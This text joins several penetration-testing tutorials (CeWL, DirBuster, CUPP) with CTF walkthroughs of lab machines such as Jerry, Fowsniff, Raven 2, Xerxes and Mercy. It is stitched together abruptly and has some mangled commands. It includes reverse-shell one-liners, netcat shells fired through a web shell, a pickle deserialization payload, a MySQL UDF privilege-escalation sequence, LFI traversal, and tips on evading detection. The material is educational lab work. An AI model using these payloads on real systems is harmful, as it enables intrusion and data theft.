cewl http://www.ignitetechnologies.in/ -m 9

The above command will generate a list of minimum 9 words, as you can observe in following image, it has crawl to the given website and print the list of word with minimum 9 characters.

Retrieving Emails from a Website

You can use -e option that enables email parameter along with -n option that hides the list of word generated while crawling the given website.

cewl http://www.ignitetechnologies.in/ -n -e

As shown in the below image, it has successfully found 1 email-id from inside the website.

Count the number of Word Repeated in a website

If you want to count the number of words repeated several times in a website, then use -c optionsthat enables count parameter.

cewl http://www.ignitetechnologies.in/ -c

As you can observe from the given below image that it has print the count for each word which is repeated in the given website.

Increase the Depth to Spider

If you want to increase the level of spider for generating larger list of word by enumerating more new words from the website then use -d option along with depth level number that enables depth parameter for making more intense creeping. By Default it the depth level set is 2.

cewl http://www.ignitetechnologies.in/ -d 3

Extra Debug Information

You can use -d option that enables debug mode and shows error and raw detail of website while crawling.

cewl http://www.ignitetechnologies.in/ --debug

Verbose Mode

To expand the website crawling result and for retrieving completed detail of a website, you can use -v option for verbose mode. Rather than generating wordlist, it will dump the information available on the website.

cewl http://www.ignitetechnologies.in/ -v

Generating Alpha-Numeric

If you want to generate an alpha-numeric wordlist then you can use --with-numbers option along with command.

cewl http://testphp.vulnweb.com/ --with-numbers

From the given below image you can observe, this time it has generated an alpha-numeric wordlist.

Cewl with Digest/Basic Authentication

If there is page authentication for login into website then above default will not work properly, in order to generate a wordlist you need to bypass the authentication page by using the following parameter:

--auth_type: Digest or basic.

--auth_user: Authentication username.

--auth_pass: Authentication password.

cewl http://192.168.1.105/dvwa/login.php --auth_type Digest --auth_user admin --auth_pass password -v

cewl http://192.168.1.105/dvwa/login.php --auth_type basic --auth_user admin --auth_pass password -v

From the given below image you can observe, it has got http-response 200 and hence generated the wordlist.

Proxy URL

When any website is running behind any proxy server then cewl will not able to generate wordlist with the help of default command as shown in the given below image.

cewl -w dict.txt http://192.168.1.103/wordpress/

You can use --proxy option to enable Proxy URL parameter to generate a wordlist with the help of following command:

cewl --proxy_host 192.168.1.103 --proxy_port 3128 -w dict.txt http://192.168.1.103/wordpress/

As you can observer in the given below image after executing 2^nd command, it has successfully print the list of word as output result.

Hello CTF Crackers!! Today we are going to capture the flag on a Challenge named as “Jerry” which is available online for those who want to increase their skill in penetration testing and black box testing. Jerry is a retired vulnerable lab presented by ‘Hack the Box’ for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to expert level.

Level: Easy

Flags: There are two flags. (user.txt & root.txt)

IP Address: 10.10.10.95

Methodology:

§ Port scanning and IP discovery

§ Browsing the IP on port 8080

§ Enumerating served webpage

§ Getting Login Credentials

§ Attacking using Metasploit

§ Getting root Access

§ Reading the flags

Walkthrough

Since these labs are available online via VPN therefore, they have a static IP. The IP of Jerry is 10.10.10.95

Let’s start off with scanning the network to find our target

nmap -sV 10.10.10.95

So here, we notice very interesting result from nmap scan, here it shows port 8080 is open for Apache Tomcat/ Coyote JSP Engine 1.1

Next order of business is to browse the IP on a Web Browser.

On opening the IP on the Web Browser, we are greeted with the default TomCat page. After some enumeration here and there, we found the “Manager App” Link. On clicking on this link, we are struck with a Login Form as shown below.

Here, after some twerking with some passwords and other stuff, we found that clicking on “Cancel” Button triggers a 401 Error.

After closely reading the example on the webpage provided, we got the Logon Credentials

User: tomcat

Password: s3cret

Its time to attack, using the swiss knife of any penetration tester – “Metasploit”.

After doing some research and some tries, it was clear that we can use the tomcat_mgr_upload exploit.

So, let’s do this:

msf> use exploit/multi/http/tomcat_mgr_upload

msf exploit(multi/http/tomcat_mgr_upload) > set rhost 10.10.10.95

msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080

msf exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat

msf exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret

msf exploit(multi/http/tomcat_mgr_upload) > exploit

As show in the screenshot provided below, it is clear that the exploit runs successfully and gives an meterpreter session with elevated privileges.

We traverse through the Directories to get flag using commands like “ls” and “cd”

After a little bit of enumeration, we get to the C:\Usersdirectory. Here we come across the Administrator User Directory so we traverse to that directory. And the further we traverse to the Desktop Directory.

This gives us the flags directory, which on opening gives us a text file named 2 for the price of 1. On opening we get both the user and root password.

In this article, we are focusing on transient directory using Kali Linux tool Dibuster and trying to find hidden files and directories within a web server.

Table of Content

· What is DirBuster

· Default Mode

· GET Request Method

· Pure Brute Force (Numeric)

· Single Sweep (Non-recursive)

· Targeted Start

· Blank Extensions

· Search by File Type (.txt)

· Changing DIR List

· Following Redirects

· Attack Through Proxy

· Adding File Extensions

· Evading Detective Measures (Requests Per Second)

What is DirBuster

DirBuster is an application within the Kali arsenal that is designed to brute force web and application servers. The tool can brute force directories and files. The application lets users take advantage of multi thread functionality to get things moving faster. In this article we will give you an overview of the tool and its basic functions.

Default Mode

We start DirBuster and only input http://testphp.vulnweb.com/ in the target URL field. Leave the rest of the options as they are. DirBuster will now auto switch between HEAD and GET requests to perform a list based brute force attack.

Let’s hit Start. DirBuster gets to work and starts brute forcing and we see various files and directories popping up in the result window.

GET Request Method

We will now set DirBuster to only use the GET request method. To make things go a little faster, the thread count is set to 200 and the “Go Faster” check box is checked.

In the Results - Tree View we can see findings.

Pure Brute Force (Numeric)

DirBuo perform ster allows a lot of control over the attack process, in this set we will be using only numerals to perform a pure brute force attack. This si done by selecting “Pure Brute Force” in the scanning type option and selecting “0-9” in the char set drop down menu. By default the minimum and maximum character limit is set.

In the Results - Tree View we can see findings.

Single Sweep (Non-recursive)

We will now perform a single sweep brute force where the dictionary words are used only once. To achieve this, we will unselect the “Be Recursive” checkbox.

In the Results - List View we can see findings.

Targeted Start

Further exploring the control options provided by DirBuster, we will set it up to start looking from the “admin” directory. In the “Dir to start with” field, type “/admin” and hit start.

In the Results - Tree View we can see findings.

Blank Extensions

DirBuster can also look into directories with a blank extensions, this could potentially uncover data that might be otherwise left untouched. All we do is check the “Use Blank Entension” checkbox.

We can see the processing happen and DirBuster testing to find directories with blank extensions.

Search by File Type (.txt)

We will be setting the file extension type to .txt, by doing so, DirBuster will look specifically for files with a .txt extension. Type “.txt” in the File extension field and hit start.

We can see the processing happen and DirBuster testing to find directories with a .txt extension.

Changing DIR List

We will now be changing the directory list in DirBuster. Options > Advance Options > DIrBuster Options > Dir list to use. Here is where we can browse and change the list to “directory-list-2.3-medium.txt”, found at /usr/share/dirbuster/wordlists/ in Kali.

We can see the word list is now set.

Following Redirects

DirBuster by default is not set to follow redirects during the attack, but we can enable this option under Options > Follow Redirects.

We can see the results in the scan information as the test progresses.

Results in the Tree View.

Attack through Proxy

DirBuster can also attack using a proxy. In this scenario we try to open a webpage at 192.168.1.108 but are denied access.

We set the IP in DirBuster as the attack target.

Before we start the attack, we setup the proxy option under Options > Advance Options > Http Options. Here we check the “Run through a proxy” checkbox, input the IP 192.168.1.108 in the Host field and set the port to 3129.

We can see the test showing results.

Adding File Extensions

Some file extensions are not set to be searched for in DirBuster, mostly image formats. We can add these to be searched for by navigating to Options > Advance Options > HTML Parsing Options.

We will delete jpeg in this instance and click OK.

In the File Extension filed we will type in “jpeg” to explicitly tell DirBuster to look for .jpeg format files.

We can see in the testing process, DirBuster is looking for and finding jpeg files.

Evading Detective Measures

Exceeding the warranted requests per second during an attack is a sure shot way to get flagged by any kind of detective measures put into place. DirBuster lets us control the requests per second to bypass this defense. Options > Advance Options > Scan Options is where we can enable this setting.

We are setting Connection Time Out to 500, checking the Limit number of requests per second and setting that field to 20.

Once the test in initiated, we will see results. The scan was stopped to show the initial findings.

Once the scan is complete the actual findings can be seen.

We hope you enjoy using this tool. It is a great tool that’s a must in a pentesters arsenal.

Stay tuned for more articles on the latest and greatest in hacking.

Fowsniff: 1 Vulnhub Walkthrough

Hello friends! Today we are going to take another boot2root challenge known as Fowsniff. The credit for making this vm machine goes to “berzerk0” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM here.

Security Level: Beginner

Flags: There is one flag (flag.txt).

Table of contents:

· Port scanning and IP discovery.

· Hitting on port 80

· Finding hashes on Pastebin

· Decoding hashes

· Brute force pop3 login

· Connecting to pop3

· Finding SSH username and password

· Finding privilege escalation vectors

· Exploiting Misconfiguration in system

· Getting root access.

· Reading the flags.

Walkthrough

Let’s start off with scanning the network to find our target.

netdiscover

We found our target –> 192.168.1.29

Our next step is to scan our target with nmap.

nmap -A -p- -T4 192.168.1.29

The NMAP output shows us that there are 4 ports open: 22(SSH), 80(HTTP), 110(POP3), 143(IMAP)

We find that port 80 is running http, so we open the IP in our browser.

We don’t find anything on webpage. Dirb scan and nikto also didn’t reveal anything, so we googled “fowsniff corp” and found a pastebin link that contained username and passwords. (You can find the link here)

We cracked the hashes use this siteand find passwords to the respective email addresses. But only 8 hashes were cracked and there are 9 usernames.

So we create two wordlists one for username and one for passwords, we will use this to brute force pop3 login.

We use Metasploit-framework to brute force pop3 login. After running the brute forcing pop3 login we find the correct credentials to be “seina:scoobydoo2”.

msf > use auxiliary/scanner/pop3/pop3_login

msf auxiliary(scanner/pop3/pop3_login) > set rhosts 192.168.1.29

msf auxiliary(scanner/pop3/pop3_login) > set user_file user.txt

msf auxiliary(scanner/pop3/pop3_login) > set pass_file pass.txt

msf auxiliary(scanner/pop3/pop3_login) > set verbose false

msf auxiliary(scanner/pop3/pop3_login) > run

We connect to pop3 service on the target server and login using the credentials we retrieved. After logging in we list the messages and find there are 2 messages.

nc 192.168.1.29 110

user seina

pass scoobydoo2

list

We retrieved the 1^st message and find that it contains the password to connect through SSH.

retr 1

We retrieved the second message and find a message that hints that use the username “baksteen”.

retr 2

We use the credentials “baksteen:S1ck3nBluff+secureshell” to login through SSH.

ssh baksteen@192.168.1.29

After gaining access we enumerate the system, as user “baksteen” belongs to two different groups. We use try to find files that belong to “users” group and find a file called “cube.sh”.

find / -group users -type f 2>/dev/null

We take a look at the content of the file and find it contains the message that comes once we login through SSH.

cd /opt/cube

cat cube.sh

We open the file with vim, and add python reverse shell one liner in the file.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.29",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

We try to run it and find it gives an error “python: command is not found”. We try to locate python and find it contains python3.

So we make changes to the exploit we change the python reverse shell one liner. We replace python with python3.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.29",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

As when we login through SSH we get a banner similar to the one that “cube.sh” contains. So we check “/etc/update-motd.d/” directory to look for executables that might run this program and find that file “00-header” runs this shell script.

So now we exit the SSH and setup our listener using netcat, then we again connect through SSH. So that our reverse shell gets executed.

ssh baksteen@192.168.1.29

As soon as we successfully login, we get a reverse shell as root user on our netcat listener. We go to the root directory and find the file called “flag.txt”. We take a look at the content of the file and find the congratulatory message.

nc -lvp 1234

cd /root

cat flag.txt

Hello everyone and welcome to yet another CTF challenge walkthrough. This time we’ll be putting our hands on Raven 2. It is the sequel to previously solved Raven. Raven 2 is a Beginner/Intermediate boot2root machine. The goal is to snag 4 flags and get the root on target VM.

Table of contents:

1. Port scanning and IP discovery.

2. Hitting on port 80 and discovery of WordPress CMS.

3. Directory enumeration to find a directory “vendor.”

4. Discovering a file PATH to snag flag 1.

5. Discovering a file VERSION to snag the PHP version.

6. Exploiting RCE in PHP version 5.2.6

7. Making local changes in the exploit code for successful delivery of payload.

8. Getting a netcat shell using the uploaded payload.

9. Snagging flag 2 in /var/www

10. Reading database password from wp-config file.

11. Running LinEnum.sh to enumerate processes.

12. Exploiting UDF dynamic library vulnerability using an exploit with codename 1518.c on exploit-db

13. Setting sticky bit on find.

14. Getting root access.

15. Snagging flag4 in /root

16. Manually traversing system to find flag3.

Let’s get started then!

Discovering the active devices on a network using netdiscover and getting the IP address of our victim machine. In this case the IP address holds 192.168.1.101

Using nmap on the victim machine we got three ports open—22,80 and 111

So we instantly moved to the port 80 and discovered a website of Raven Security.

We thought it would be wise to run a directory test before we scan anything else. So we ran a directory buster test to find “vendor” directory in the victim machine.

Accessing /vendor the following files and folders came out.

Among them a file called PATH caught our attention since it is no ordinary name. So we opened it in the browser only to find flag1!

There was yet another file worth noting called VERSION. On opening it we found the version of something. It was unclear which software had version 5.2.6 but look at the previous screen again… A file exists called: PHPMailerAutoload.php. It is fairly certain now that version 5.2.6 was of PHPMailer. So, on a bit of internet surfing we found an RCE exploit for the version!

Now we downloaded this python file but don’t run it yet! There are some changes to be made which are highlighted in the screen below.

1. A coding: utf-8 tag is to be added at the top.

2. Set the target of vulnerability to 192.168.1.101/contact.php where this vulnerability exists (read PHPMailer’s function).

3. Set the backdoor’s name. Let it be backdoor.php for now.

4. Set the local IP in the Subprocess call.

5. And finally, the location to upload the backdoor in.

Now run this python script and wait for the success message.

Activate a netcat listener on port 443. It is because the backdoor gives a connection on port 443 as written in the python code (Subprocess call).

Upon opening the location of backdoor we immediately got a shell!

Now we imported a proper teletype by using the python one liner and manually traversed to /var/www only to discover flag2!

Python –c ‘import pty;pty.spawn(“/bin/bash”)’

Cd /var/www

Cat flag2.txt

Now we thought of checking the wordpress directory as we done in the prequel Raven 1.

Cd /var/www/html/wordpress

Cat wp-config.php

We found the root database password! It was “R@v3nSecurity”

Then we changed the active directory to /tmp and imported LinEnum.sh, a script to enumerate many of the basic and advanced linux details.

It was hosted in a folder on our local machine and was imported into the victim machine using wget command.

My local IP address was 192.168.1.109 in this case.

Cd /tmp

Wget http://192.168.1.109/LinEnum.sh

Chmod 777 LinEnum.sh

./LinEnum.sh

We found a MySQL-Exploit-Remote-Root-Code-Execution-Privesc vulnerability! (FOR MORE INFO: https://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html)

So, we searched for a UDF dynamic library exploit and it was named “1518.c” in exploit database.

https://www.exploit-db.com/exploits/1518/

The exploits run by compiling the raw C code to .so file and then transferring it to the victim machine and exploiting MySQL vulnerability.

The first step was to compile it.

Searchsploit –m 1518.c

gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518. –lc

And hence, we transferred this “.so” file in the /tmp directory in victim’s machine.

wget http://192.168.1.109/1518.so

chmod 777 1518.so

Now we logged in to the mysql interface.

mysql –u root –p

After getting a MySQL shell, we started exploiting it using the vulnerability we just found

use mysql;

Now, we created a table called “foo”

In this table, we inserted the link to the 1518.so file we just imported from local machine to /tmp directory.

We dumped the same file to /usr/lib/mysql/plugin/ directory (since it was vulnerable)

In the most important step, we created a UDF function named do_system, that will invoke the code that implements the function.

Hence, we are invoking the code “chmod u+s /usr/bin/find” to set the sticky bit on “find”

create table foo(line blob);

insert into foo values(load_file('/tmp/1518.so'));

select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';

create function do_system returns integer soname '1518.so';

select do_system('chmod u+s /usr/bin/find');

Now we traversed back to the directory /tmp and executed commands using the find utility.

Touch raj

Find raj –exec “whoami” \;

Find raj –exec “/bin/sh” \;

Cd /root

Cat flag4.txt

Only flag left to find was flag3.txt. You can do this with find utility but we had a bit of luck and found it manually!

It was lying in /var/www/html/wp-content/uploads/2018/11

We copied it in /var/www/html using cp.

Since it was a png file we had to view it on browser.

Hence, this is how we rooted Raven 2 and snagged all four flags! Hope you liked it!

FourAndSix: 2 is the sequel for previously solved vulnerable machine FourAndSix by Fred uploaded on vulnhub. It is not mandatory but is advised to read the prequel of this lab here. You can download the FourAndSix:2 vulnerable lab from here. The challenge is to become root and read flag.txt in the same directory.

Table of contents:

· Discovery of IP address.

· Scanning for open ports and services.

· Discovering universally accessible directory in victim’s machine.

· Cracking the password of archive found in storage partition.

· Reading the pub file and logging in using ssh.

· Discovering utilities with sticky bit on them.

· Using doas to get root.

· Snagging the flag!

· Let’s get started then.

First step is, as usual, to find the IP of the target machine. In this case it is 192.168.1.103

Next we discover open ports and services using nmap. The ports open were 22, 111, 2049.

There was only one way to proceed and that is port 2049. So, we used showmount command to check for nfs shared partitions.

Later, we mounted it under the folder name “raj” using the mount command. And we found a 7z compressed file.

Showmount –e 192.168.1.103

Mount –t nfs 192.168.1.103:/home/user/storage raj

But the file “backup.7z” was unfortunately password protected.

So, after trying out a number of options like John The Ripper and etc. and getting zero success, we found a site online to break it’s password.

The password was found to be: chocolate

We extracted its contents in the same folder and found a few images along with RSA keys. As port 22 is running SSH service on the target machine, we can use RSA private key to login. We open RSA public key to take a look at the username.

cat id_rsa.pub

We tried logging in to ssh but it was asking for a passphrase. So, we created the following script to find the correct password.

cat /usr/share/wordlists/metasploit/adobe_top100_pass.txt | while read pass; do if ssh-keygen –c –C “user@forandsix” –P $pass –f id_rsa &>/dev/null; then echo $pass; break; fi; done

From the id_rsa.pub file we found the user for the secure shell of victim and logged in to it. The password was: “12345678”.

Ssh –I id_rsa user@192.168.1.103

We used the find utility to discover files or packages with suid bit set on them.

Find / -perm –u=s –type f 2>/dev/null

We found an interesting utility with suid bit: /usr/bin/doas which is an alternate to sudo.

After reading the “doas.conf” file, we find that “less” can be run as root.

Let’s pick the configuration file and try to understand it word by word. Doas utility executes commands as other users according to the rules in doas.conf configuration file.

Permit/Deny: allows the rule.

Nopass: user is not required to enter any password.

Persist: After the user successfully authenticates, do not ask for a password again for some time.

Keepenv: The user’s environment is maintained.

Cmd: command is allowed to run.

Since, doas configuration file says that less can be run with no password at all as root with no password, it can be used for shell escaping.

Doas /usr/bin/less /var/log/authlog

Enter v to escape to vi and then “!sh” to escape to our brand new shell.

The final step was to snag the flag! It was in root directory as told by the creator of the VM.

Id shows that the shell is root shell and finally we read the congratulatory flag using cat!

So this was how we root the FourAndSix:2. Hope you liked it.

Welcome to another boot2root CTF challenge “Xerxes: 1” uploaded by bas on vulnhub. As, there is a theme, and you will need to snag the flag in order to complete the challenge and you can download it from the given below link:

https://download.vulnhub.com/xerxes/xerxes.tar.gz

By author, it has a good variety of techniques needed to get root – no exploit development/buffer overflows. So, on the basis of our experience and knowledge, we have made progress in solving the lab.

Level: Beginner

Penetrating Methodologies:

Network scanning (Nmap)
Surfing HTTP web services
Directory bruteforcing (Dirb)
Base64 decoding
Gimp Editor to zoom image and find the hint
Decimal to ASCII, Brainfuck decrypting
Search and Capture the flag at various stages

Walkthrough

First step is as always, running netdiscover on the VM to grab the IP address. In my case the IP was 192.168.1.102.

Now, let us run a scan on the discovered IP address to see the available ports

nmap -A 192.168.1.102

From the nmap scan result, we found port 80 is open for http service, let’s navigate to port 80 in the browser.

When we didn’t found any remarkable clue from its home page, then without wasting much time, I use dirb for web directory enumeration and ran the following command:

dirb http://192.168.1.102

From the above scan we found that there is another directory /dev, so let’s browse it.

http://192.168.1.102/dev

Here we found the link for forgot password, so we will browse it to see if there is something useful.

To our surprise, there is a QR code, so let’s scan it to see what it hidden inside. On scanning QR code we found a base64 encoded text.

Now let’s decode the base64 string to find if there is any hint or useful information available.

The clue said look deeper, so we tried to zoom the image and found that there are some different pixels on the top left of the image. To read that we used the color-picker tool in the GIMP editor. To do this, we used Gimp Editor tool and used the option Open in Layers in the File menu, after that we deselected all the layers except the alpha layer of the image, then used the Color-Picker tool from the Tools menu to find the alpha values of the pixels

After collecting all the alpha values, we'll find the ASCII characters of the decimal values we found.

Now, we came to know that the ascii chars are actually the a base64 encoded value, so let’s decrypt and see what we get

After decoding the base64 we found that it is another encryption named BrainFuck, let’s try to decrypt the BrainFuck encrypted string.

Now let us try to use this value as password to upload our file, after trying to upload php shell, we tried to upload shell in “pht” extension

Now access the shell from URL and run ls command to check if the shell has created the RCE vulnerability.

Since it was vulnerable to RCE, therefore we can exploit the victim’s machine by executing following command.

http://192.168.1.102/dev/upload/shell.pht?cmd=nc –e/bin/bash 192.168.1.109 1234

On the other hand, keep the netcat listener active on the kali terminal,

nc -lvp 1234

As soon as we get our reverse connection, first thing we do is to upgrade our session into a more interactive one, so we will use python one-liner to upgrade our session from sh to bash

python -c ‘import pty;pty.spawn(“/bin/bash”)’

Now let’s go to home and find the number of users

cd /home

Here we found that there are 3 users named amanpour, curtiz and Delacroix, we will first head in amanpour and check the contents

cd amanpour

ls -la

Here we found .bash_history file, now we will check the contents of the file

cat .bash_history

In this file you will find the python command for new password, run the command and you will find the password

python steqr.py -f newpassword

Now we got the password of amanpour so lets try to connect to amanpour using these credentials

ssh amanpour@192.168.1.102

Here we will search for files with suid permissions

find / -perm -4000 -type f 2>/dev/null

here we found file /opt/notes, so let’s go in /opt file to find the files inside it, here along with notes we will also find notes.py, so we will see the contents of notes.py file.

cd /opt

cat notes.py

Here we will find out that whatever the file needs to be loaded in the notes executable should either be in /home/curtiz or the filepath should start with ../../ as to first go to directory backwards and then provide full path from /

In notes.py we find that the script is using pickle module. Now the pickle module is vulnerable to insecure deserialization. So we can execute any code of our choice. As we can load the file in the script we created a file that executes “/bin/sh”

cat > /tmp/shell

cos

system

(S’/bin/sh’

tR.

Now execute the notes executable file and load the shell file directly from tmp directory

./notes

load ../../tmp/shell

As soon we run load /tmp/shell we spawn a shell and when we checked the id, we found that the amanpour is also a member of curtiz group, so we will now go to curtiz home directory

cd /home/curtiz

When we check the content of the directory, we find a file called notes. We take look at the content of notes and find a hint to login through user Marie.

cat notes

We check passwd file to find if user “Marie” exists. After opening the file, we find that the “Marie” is the first name for user “delacroix”. We also find that it uses a custom shell called “/bin/delacroix”.

cat /etc/passwd | grep “Marie”

Now lets see the contents of “/bin/delacroix” using strings function, here you’ll find a md5 hash

strings /bin/delacroix

Now let’s decrypt the md5 value online, it will give us the result as “VonBraun”.

Now let’s try to connect as Delacroix via SSH with this password, but we are unable to successfully login.

ssh delacroix@192.168.1.102

In /home/curtiz directory, there was a file called id_rsa. We check the content of the file and find it is RSA private key.

cat id_rsa

We copy the RSA key from the target machine to our machine. Now when we login through SSH using the private key.

ssh -i id_rsa delacroix@192.168.1.102

After logging in, we will check the contents of the “/home/delacroix” directory only to discover two files check.sh and generate.sh. “check.sh” script provides the customized login message. The script “generate.sh” creates a new “.last” file and uses the timestamp of the file to generate a unique md5.

So now we will need to find the md5 hash value of the creation time of “.last” file, for that first we will use stat command to check the time when the file was created

stat .last

After getting the timestamp of “.last” file, it’s time to get the md5 hash value, for this we’ll use md5sum function along with echo command to get md5 hash. We are going to use the time at which marie created the file

echo 00:19:51 |md5sum

Now we have the password too, so let’s capture the flag, open the root terminal using sudo bash command along with the password we found and BOOM. You’re logged in as root now.

Look around to find the flag now, use cd command to go to the root directory and use ls to check the contents of the directory. You will find file flag here.

cd /root

When we see the type of flag file, it displayed that it is an png image data

file flag

Let’s use netcat to transfer this file to our kali machine

nc 192.168.1.109 5555 < flag

In the meanwhile you should also start netcat listener in the kali machine with directing the incoming file to a new file

nc -lvp 5555 > flag

Now finally we open the flag file and it’s done

MERCY is a machine dedicated to Offensive Security for the PWK course. MERCY is a name-play, and has nothing to do with the contents of the vulnerable machine. You can download the Mercy vulnerable lab from here. The challenge is to get root on the Targeted Virtual Machine and read the proof.txt within that directory.

Flag: Proof.txt

Tables of Contents:

· IP discovery and Port Scanning.

· Browsing the IP on port 8080.

· Decoding Base64 String.

· Using Enum4linux tool for enumerating information of the Target Machine.

· Getting Login Credentials to connect via smbclient.

· Port Knocking.

· Discovering accessible directory’s on victim’s machine.

· Browsing through discovered directory’s.

· Searching exploit via searchsploit.

· Finding Login Credentials for Tomcat Server.

· Logging into Tomcat Server using Metasploit.

· Exploiting Misconfiguration in the Target Machine.

· Using Msfvenom for creating payload one-liner.

· Getting root access.

· Reading the flag.

Let’s Begin with the Walkthrough!!

Let’s start off with scanning the network to find our targets IP.
netdiscover

We found our target –> 192.168.1.105
Our next motive is to scan the target IP with nmap.
nmap -A 192.168.1.105

The NMAP output shows various open ports: 22(ssh), 53(domain), 80(http), 110(pop3), 139(netbios-ssn), 143(imap), 445(netbios-ssn), 993(ssl/imaps), 995(ssl/pop3), 8080(http). Since port 80 is filtered we cannot directly browse the Target IP in the Browser. Here we got a clue as a entry /tryharder/tryharderin robot.txt as it might come in handy later on. Therefore we notice that port 8080 is openforApache Tomcat/ Coyote JSP Engine 1.1. So we browse the Target IP on port 8080 on the browser.

Now browsing through the discovered entry /tryharder/tryharder on port 8080 gave us a base64 encoded string. Clearly we need to decode it to move ahead.

On decoding the base64 string we found some Login Credentials which can be of great use later on.

Since port 445 is open on the Target Machine, We thought of enumerating it using enum4linux tool.
enum4linux -a http://192.168.1.105
It gave us few shared folders which can be further used to connect via smbclient.

Now connecting via smbclient using credentials “qiu:password”.
smbclient \\\\192.168.1.105\\qiu -U qiu
Further exploring through directories we have downloaded the config file on our Linux Desktop.

Reading the contents of the config file gave us a sequence of ports to knock which will result in opening the http port 80.

Knocking the sequence of ports using the following command:

knock 192.168.1.105 159 2739 4

Now from nmap scan we confirmed that http port 80 got open after knocking.

Since port 80 got open, we browsed the Target IP on the browser which displayed the message as you can see in the image, which came out to be useless to further proceed towards our goal.

Now we thought of enumerating for accessible directories on the Target Machine.

dirb http://192.168.1.105

While browsing robots.txt file in the browser gave us two disallowed hidden directories as shown in the image.

Bowsing through the directory 192.168.1.105/nomercy in the browser opened a vulnerability scanner webpage whose banner RIPS 0.53 left us curious to search more about it.

Then while we search RIPS 0.53 over searchsploit, it came out to be an Multiple Local File Inclusions Exploit. Next we copied the exploit over our Linux Desktop and read its copied text file as you can see in the image. Here we also copied the one-liner /windows/code.php?file=../../../../../../etc/passwd.

We used LFI to take a look at the content of the passwd file as it was shown in the POC.

192.168.1.105/nomercy/windows/code.php?file=../../../../../../etc/passwd

Since we know there is a tomcat service running on the target system we can take a look the tomcat-users.xml file using LFI that will provide us with the username and password, browsing it on browser gave us two Login Credentials for Tomcat Server as shown on the image.

Logging into Tomcat server using Metasploit’s Tomcat Manager using the following credentials “thisisasuperduperlonguser:heartbreakisinevitable”

msf > use exploit/multi/http/tomcat_mgr_upload

msf exploit(multi/http/tomcat_mgr_upload) > set rhost 192.168.1.105

msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080

msf exploit(multi/http/tomcat_mgr_upload) > set httpusername thisisasuperduperlonguser

msf exploit(multi/http/tomcat_mgr_upload) > set httppassword heartbreakisinevitable

msf exploit(multi/http/tomcat_mgr_upload) > exploit

Now using a one-liner to spawn a tty shell:

python -c 'import pty; pty.spawn("/bin/sh")'

Further logging in as user fluffy.

su fluffy

Password: freakishfluffybunny

Exploring through various directories, we read a file timeclock which gave useful information that a crontab service probably be running.

Moving on!! We created a one-liner payload using Msfvenom:

msfvenom –p cmd/unix/reverse_netcat lhost=192.168.1.109 lport=8888 R

After that append the one-liner payload in the timeclock file.

echo “mkfifo /tmpmzlat; nc 192.168.1.109 8888 0

/tmp/zlat 2>&1; rm /tmp/zlat” >>timclock

Since the one-liner got executed with the timeclock file. Therefore we got a reverse shell on our netcat listener. To spawn the shell we have used python -c 'import pty; pty.spawn("/bin/sh")'. Booyeah!! We have got the root access and found proof.txt. We take a look at the content of the file and greeted with a congratulatory message.

Hello Friends!! Today we are going explore the function of Cupp which is an authoritative tool that creates a wordlist especially particular for a person that can be use while making brute force attack for guessing login credential.

Table of Content

Introduction to Cupp

How Cupp Works

Getting Started

Generating Custom Dictionary

Adding to Custom Dictionary

Downloading Dictionaries from Cupp Repository

Downloading Default Usernames and Passwords

Quiet Mode

Introduction to Cupp

Cupp stand for Common User Passwords Profiler and this tool can be used in many circumstances like license penetration tests or forensic crime investigations, CUPP is a cross platform and written in Python and it’s functioning is simple but with very powerful results. This application is a social engineers best friend when it comes to crating targeted password dictionaries which are tailored to an individual.

How Cupp Works

Cupp takes vectors from the profiling done for an individual, such as their nick name, pets name, child’s birthdate, etc. It works on the principle that a password is, more often, a combination of things known to an individual. These known thing are often personal details that are very close to person’s heart.

In cases when a person might use special notations in place of alphabets (e.g: leet can be written as 133t) Cupp has you covered.

Installation and Configuration

Cupp can be downloaded from GitHub using the “git clone” command. Winthin the downloaded Cupp folder, run the “cup.py” file. Once the file is run, the program shows you the various options it has to offer.

git clone https://github.com/Mebus/cupp.git

cd cup

./cup.py

Optional Arguments:

-i Interactive questions for user password profiling

-w FILENAME Use this option to profile existing dictionary,

-l Download huge wordlists from repository

-a Parse default usernames and passwords directly from Alecto DB.

Project Alecto uses purified databases of Phenoelit and CIRT which merged and enhanced.

-v Version of the program

Generating Custom Dictionary

Now it’s time to have some fun!

We will be using the interactive option to generate the custom dictionary. You will see that we have the option to input options such as pet’s name, child’s name, partners nickname, etc. All these things are highly personal and very common to find these things in a password, one way or another.

There’s also an option to add any specific keywords, special characters and random numbers. Apart from all this, there’s the option to activate Leet mode, this will make the generated dictionary extremely effective.

That’s all, the dictionary now gets made and saved.

./cupp.py -i

Adding to Custom Dictionary

Cupp gives us the option to add more words to our created dictionary. We can customize the kind of words we would like to add by using the provided options.

./cup.py -w raj.txt

Downloading Dictionaries from Cupp Repository

Cupp has its own repositories of dictionaries which are pre classified. These dictionaries can be downloaded and used. The downloaded files are compressed and have to be uncompressed to be viewed.

Enter the number to choose name to select dictionary you want to download, we have pressed 16and downloaded to view a dictionary of Hindi names.

./cupp.py –l

cd directories

cd hindi

gzip -d hindu-names.gz

cat hidu-names

Downloading Default Usernames and Passwords

Cupp can download premade dictionaries holding the most common usernames and passwords from the project Alecto database for usage.

./cupp.py –a

cat alectodb-password.txt

Quiet Mode

Quiet mode is for running Cupp in a more hush-hush way. If you’re the kind of person who does not want a big banner on their screen showing everyone what you’re doing, you’ll like this option. This basically makes for a cleaner screen while cup is carrying out the commands you’re giving it, without the funny cow popping up on top.

We’re going the couple the quite mode option with the dictionary download option that we demonstrated above.

./cupp.py –a –q

